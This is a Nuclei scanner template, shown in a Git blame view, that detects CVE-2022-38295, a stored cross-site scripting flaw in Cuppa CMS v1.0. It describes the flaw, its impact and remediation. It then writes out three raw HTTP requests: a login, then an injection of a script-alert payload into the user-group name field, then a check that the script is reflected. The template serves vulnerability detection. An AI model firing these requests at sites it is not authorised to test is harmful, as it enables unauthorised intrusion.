daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2022/CVE-2022-38295.yaml

70 lines
2.6 KiB
YAML
Raw Normal View History

templates added
2023-04-21 08:56:01 +00:00
id: CVE-2022-38295
info:
name: Cuppa CMS v1.0 - Cross Site Scripting
author: theamanrawat
severity: medium
description: |
Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function.
Added Impact
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.
updated 2022 CVEs
2023-09-06 11:59:08 +00:00
remediation: |
To remediate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
templates added
2023-04-21 08:56:01 +00:00
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-38295
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot:
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/cvemon
templates added
2023-04-21 08:56:01 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-38295
cwe-id: CWE-79
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot:
2024-06-07 10:04:29 +00:00
epss-score: 0.0024
epss-percentile: 0.61973
updated 2022 CVEs
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
templates added
2023-04-21 08:56:01 +00:00
metadata:
boolean format update
2023-06-04 08:13:42 +00:00
verified: true
updated 2022 CVEs
2023-09-06 11:59:08 +00:00
max-request: 3
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
vendor: cuppacms
product: cuppacms
auto tagging via templateman
2024-01-14 09:21:50 +00:00
tags: cve2022,cve,xss,cuppa,authenticated,cuppacms
templates added
2023-04-21 08:56:01 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
templates added
2023-04-21 08:56:01 +00:00
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
POST /components/table_manager/classes/functions.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
id_field=0&name_field="><script>alert(document.domain)</script>&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable
- |
POST /components/table_manager/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
path=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- '"><script>alert(document.domain)</script>'
- 'cuppa_html'
condition: and
- type: word
part: header_3
words:
- "text/html"
- type: status
status:
- 200
Auto Template Signing [Tue Jan 30 06:46:18 UTC 2024] :robot:
2024-01-30 06:46:18 +00:00
# digest: 4a0a0047304502205702724d42507ffc7d8cd044e6d6cf80b1f1c0a3064667003638e86af6920a29022100c1aa20860b9fe2846eca8e70f515a44501a69d01c6e6e2f1e78c634a549800ce:922c64590222798bb761d5b6d8e72950